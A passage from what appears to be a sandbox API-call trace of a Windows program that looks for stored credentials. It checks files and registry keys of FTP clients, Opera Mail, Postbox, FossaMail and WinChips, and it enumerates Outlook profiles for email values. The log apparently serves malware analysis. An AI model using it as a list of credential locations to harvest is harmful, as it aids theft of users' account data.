lpMem=0x69cfa8 | out: hHeap=0x690000) returned 1 [0147.689] GetProcessHeap () returned 0x690000 [0147.689] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.689] GetProcessHeap () returned 0x690000 [0147.689] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.690] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.690] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Windows") returned 0x0 [0147.690] GetProcessHeap () returned 0x690000 [0147.690] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6ab500 [0147.691] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.692] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\32BitFtp.ini", arglist=0x19fb94 | out: param_1="C:\\Windows\\32BitFtp.ini") returned 23 [0147.692] GetProcessHeap () returned 0x690000 [0147.692] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x32) returned 0x69cfa8 [0147.692] GetProcessHeap () returned 0x690000 [0147.692] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.693] PathFileExistsW (pszPath="C:\\Windows\\32BitFtp.ini") returned 0 [0147.694] GetProcessHeap () returned 0x690000 [0147.694] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69cfa8 | out: hHeap=0x690000) returned 1 [0147.694] GetProcessHeap () returned 0x690000 [0147.694] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.694] GetProcessHeap () returned 0x690000 [0147.694] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.695] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x6aa2c8, nSize=0x104 | out: lpDst="C:") returned 0x3 [0147.695] GetProcessHeap () returned 0x690000 [0147.695] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f78) returned 0x6ab500 [0147.695] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.696] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\FTP Navigator\\Ftplist.txt", arglist=0x19fba0 | out: param_1="C:\\FTP Navigator\\Ftplist.txt") returned 28 [0147.696] GetProcessHeap () returned 0x690000 [0147.696] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3c) returned 0x6a43d0 [0147.696] GetProcessHeap () returned 0x690000 [0147.697] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.698] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.698] PathFileExistsW (pszPath="C:\\FTP Navigator\\Ftplist.txt") returned 0 [0147.698] GetProcessHeap () returned 0x690000 [0147.698] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a43d0 | out: hHeap=0x690000) returned 1 [0147.698] GetProcessHeap () returned 0x690000 [0147.699] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.699] GetProcessHeap () returned 0x690000 [0147.699] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.699] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x6aa2c8, nSize=0x104 | out: lpDst="C:") returned 0x3 [0147.699] GetProcessHeap () returned 0x690000 [0147.699] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f92) returned 0x6ab500 [0147.700] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.701] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\Softwarenetz\\Mailing\\Daten\\mailing.vdt", arglist=0x19fb40 | out: param_1="C:\\Softwarenetz\\Mailing\\Daten\\mailing.vdt") returned 41 [0147.701] GetProcessHeap () returned 0x690000 [0147.701] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x56) returned 0x6aa530 [0147.701] GetProcessHeap () returned 0x690000 [0147.702] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.703] PathFileExistsW (pszPath="C:\\Softwarenetz\\Mailing\\Daten\\mailing.vdt") returned 0 [0147.703] GetProcessHeap () returned 0x690000 [0147.703] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0147.703] GetProcessHeap () returned 0x690000 [0147.703] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.704] GetProcessHeap () returned 0x690000 [0147.704] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f82) returned 0x6ab500 [0147.704] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.705] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\Opera Mail\\Opera Mail\\wand.dat", arglist=0x19fb4c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Mail\\Opera Mail\\wand.dat") returned 68 [0147.705] GetProcessHeap () returned 0x690000 [0147.705] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x8c) returned 0x6aa2c8 [0147.705] GetProcessHeap () returned 0x690000 [0147.706] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.714] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.714] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Mail\\Opera Mail\\wand.dat") returned 0 [0147.714] GetProcessHeap () returned 0x690000 [0147.714] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.714] GetProcessHeap () returned 0x690000 [0147.714] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ab500 [0147.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.715] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Postbox\\Postbox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6ab500, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x6ab500, pcbData=0x19fba4*=0x104) returned 0x2 [0147.716] GetProcessHeap () returned 0x690000 [0147.716] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.716] GetProcessHeap () returned 0x690000 [0147.716] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ab500 [0147.717] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.717] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\FossaMail", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6ab500, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x6ab500, pcbData=0x19fba4*=0x104) returned 0x2 [0147.717] GetProcessHeap () returned 0x690000 [0147.717] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.718] GetProcessHeap () returned 0x690000 [0147.718] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.718] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.719] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0147.720] Sleep (dwMilliseconds=0xa) [0147.782] GetProcessHeap () returned 0x690000 [0147.782] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6ab500 [0147.804] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.805] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\%s", arglist=0x19f8f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*Mailbox.ini") returned 44 [0147.805] GetProcessHeap () returned 0x690000 [0147.805] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5c) returned 0x6aa530 [0147.805] GetProcessHeap () returned 0x690000 [0147.806] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.806] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*Mailbox.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*mailbox.ini"), lpFindFileData=0x19f908 | out: lpFindFileData=0x19f908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x697858, ftLastWriteTime.dwHighDateTime=0x697858, nFileSizeHigh=0x6a3fb8, nFileSizeLow=0x6a41d0, dwReserved0=0x0, dwReserved1=0x19f964, cFileName="ը睉", cAlternateFileName="뒭蕬͈읩ᅳ䇰ﭬ\x19䂑@")) returned 0xffffffff [0147.807] GetProcessHeap () returned 0x690000 [0147.807] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0147.807] GetProcessHeap () returned 0x690000 [0147.807] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.808] GetProcessHeap () returned 0x690000 [0147.808] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e8) returned 0x6ab500 [0147.808] GetProcessHeap () returned 0x690000 [0147.808] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b578 [0147.808] GetProcessHeap () returned 0x690000 [0147.808] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3b0 [0147.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.809] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\WinChips\\UserAccounts", phkResult=0x6ab3b0 | out: phkResult=0x6ab3b0*=0x0) returned 0x2 [0147.809] GetProcessHeap () returned 0x690000 [0147.809] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3b0 | out: hHeap=0x690000) returned 1 [0147.809] GetProcessHeap () returned 0x690000 [0147.810] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.810] GetProcessHeap () returned 0x690000 [0147.810] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b578 | out: hHeap=0x690000) returned 1 [0147.810] GetProcessHeap () returned 0x690000 [0147.810] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e8) returned 0x6ab500 [0147.810] GetProcessHeap () returned 0x690000 [0147.810] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b3e0 [0147.810] GetProcessHeap () returned 0x690000 [0147.810] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0147.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.812] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", phkResult=0x6ab420 | out: phkResult=0x6ab420*=0x0) returned 0x2 [0147.812] GetProcessHeap () returned 0x690000 [0147.812] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0147.812] GetProcessHeap () returned 0x690000 [0147.812] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab350 [0147.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.814] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook", phkResult=0x6ab350 | out: phkResult=0x6ab350*=0x0) returned 0x2 [0147.814] GetProcessHeap () returned 0x690000 [0147.814] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab350 | out: hHeap=0x690000) returned 1 [0147.814] GetProcessHeap () returned 0x690000 [0147.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0147.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.815] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook", phkResult=0x6ab320 | out: phkResult=0x6ab320*=0x218) returned 0x0 [0147.815] GetProcessHeap () returned 0x690000 [0147.815] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ab8f0 [0147.816] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.816] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x0, pszName=0x6ab8f0, pcchName=0x19fb7c | out: pszName="0a0d020000000000c000000000000046", pcchName=0x19fb7c) returned 0x0 [0147.816] GetProcessHeap () returned 0x690000 [0147.817] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0147.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.818] RegOpenKeyW (in: hKey=0x218, lpSubKey="0a0d020000000000c000000000000046", phkResult=0x6ab470 | out: phkResult=0x6ab470*=0x210) returned 0x0 [0147.818] GetProcessHeap () returned 0x690000 [0147.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.819] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208) returned 0x2 [0147.819] GetProcessHeap () returned 0x690000 [0147.819] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.820] GetProcessHeap () returned 0x690000 [0147.820] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6abd08 [0147.820] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.821] wvsprintfW (in: param_1=0x6abd08, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046") returned 88 [0147.821] GetProcessHeap () returned 0x690000 [0147.821] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb4) returned 0x6aa2c8 [0147.821] GetProcessHeap () returned 0x690000 [0147.822] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.822] GetProcessHeap () returned 0x690000 [0147.822] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0147.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.823] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", phkResult=0x6ab3a0 | out: phkResult=0x6ab3a0*=0x204) returned 0x0 [0147.823] GetProcessHeap () returned 0x690000 [0147.823] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.824] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6abd08, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0147.825] GetProcessHeap () returned 0x690000 [0147.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.826] RegCloseKey (hKey=0x204) returned 0x0 [0147.826] GetProcessHeap () returned 0x690000 [0147.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0147.826] GetProcessHeap () returned 0x690000 [0147.827] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.828] RegCloseKey (hKey=0x210) returned 0x0 [0147.828] GetProcessHeap () returned 0x690000 [0147.828] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0147.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.829] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x1, pszName=0x6ab8f0, pcchName=0x19fb7c | out: pszName="13dbb0c8aa05101a9bb000aa002fc45a", pcchName=0x19fb7c) returned 0x0 [0147.829] GetProcessHeap () returned 0x690000 [0147.829] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0147.830] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.834] RegOpenKeyW (in: hKey=0x218, lpSubKey="13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x6ab360 | out: phkResult=0x6ab360*=0x210) returned 0x0 [0147.834] GetProcessHeap () returned 0x690000 [0147.834] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.835] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.835] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208) returned 0x2 [0147.835] GetProcessHeap () returned 0x690000 [0147.836] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.836] GetProcessHeap () returned 0x690000 [0147.836] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6abd08 [0147.837] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.838] wvsprintfW (in: param_1=0x6abd08, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a") returned 88 [0147.838] GetProcessHeap () returned 0x690000 [0147.838] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb4) returned 0x6aa2c8 [0147.838] GetProcessHeap () returned 0x690000 [0147.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.838] GetProcessHeap () returned 0x690000 [0147.838] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0147.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.840] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x6ab3a0 | out: phkResult=0x6ab3a0*=0x204) returned 0x0 [0147.840] GetProcessHeap () returned 0x690000 [0147.840] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.841] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.841] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6abd08, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0147.841] GetProcessHeap () returned 0x690000 [0147.841] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.843] RegCloseKey (hKey=0x204) returned 0x0 [0147.843] GetProcessHeap () returned 0x690000 [0147.843] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0147.843] GetProcessHeap () returned 0x690000 [0147.843] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.845] RegCloseKey (hKey=0x210) returned 0x0 [0147.845] GetProcessHeap () returned 0x690000 [0147.845] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0147.846] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.846] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x2, pszName=0x6ab8f0, pcchName=0x19fb7c | out: pszName="2db91c5fd8470d46b1a5bc5efab4cae7", pcchName=0x19fb7c) returned 0x0 [0147.846] GetProcessHeap () returned 0x690000 [0147.846] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0147.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.847] RegOpenKeyW (in: hKey=0x218, lpSubKey="2db91c5fd8470d46b1a5bc5efab4cae7", phkResult=0x6ab360 | out: phkResult=0x6ab360*=0x210) returned 0x0 [0147.847] GetProcessHeap () returned 0x690000 [0147.847] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.849] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208) returned 0x2 [0147.849] GetProcessHeap () returned 0x690000 [0147.849] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.849] GetProcessHeap () returned 0x690000 [0147.849] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6abd08 [0147.850] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.851] wvsprintfW (in: param_1=0x6abd08, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7") returned 88 [0147.851] GetProcessHeap () returned 0x690000 [0147.851] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb4) returned 0x6aa2c8 [0147.851] GetProcessHeap () returned 0x690000 [0147.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.851] GetProcessHeap () returned 0x690000 [0147.851] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0147.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.853] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7", phkResult=0x6ab370 | out: phkResult=0x6ab370*=0x204) returned 0x0 [0147.853] GetProcessHeap () returned 0x690000 [0147.853] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.854] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.854] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6abd08, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0147.854] GetProcessHeap () returned 0x690000 [0147.855] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.856] RegCloseKey (hKey=0x204) returned 0x0 [0147.856] GetProcessHeap () returned 0x690000 [0147.856] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0147.856] GetProcessHeap () returned 0x690000 [0147.856] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.862] RegCloseKey (hKey=0x210) returned 0x0 [0147.862] GetProcessHeap () returned 0x690000 [0147.863] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0147.863] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.864] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x3, pszName=0x6ab8f0, pcchName=0x19fb7c | out: pszName="3517490d76624c419a828607e2a54604", pcchName=0x19fb7c) returned 0x0 [0147.864] GetProcessHeap () returned 0x690000 [0147.864] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0147.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.866] RegOpenKeyW (in: hKey=0x218, lpSubKey="3517490d76624c419a828607e2a54604", phkResult=0x6ab480 | out: phkResult=0x6ab480*=0x210) returned 0x0 [0147.866] GetProcessHeap () returned 0x690000 [0147.866] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.867] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.867] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208) returned 0x2 [0147.868] GetProcessHeap () returned 0x690000 [0147.868] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.868] GetProcessHeap () returned 0x690000 [0147.868] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6abd08 [0147.869] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.870] wvsprintfW (in: param_1=0x6abd08, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604") returned 88 [0147.870] GetProcessHeap () returned 0x690000 [0147.870] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb4) returned 0x6aa2c8 [0147.870] GetProcessHeap () returned 0x690000 [0147.870] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.870] GetProcessHeap () returned 0x690000 [0147.870] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0147.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.872] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", phkResult=0x6ab490 | out: phkResult=0x6ab490*=0x204) returned 0x0 [0147.872] GetProcessHeap () returned 0x690000 [0147.872] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0147.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.873] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6abd08, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0147.873] GetProcessHeap () returned 0x690000 [0147.873] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0147.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.880] RegCloseKey (hKey=0x204) returned 0x0 [0147.880] GetProcessHeap () returned 0x690000 [0147.880] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0147.880] GetProcessHeap () returned 0x690000 [0147.880] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.882] RegCloseKey (hKey=0x210) returned 0x0 [0147.882] GetProcessHeap () returned 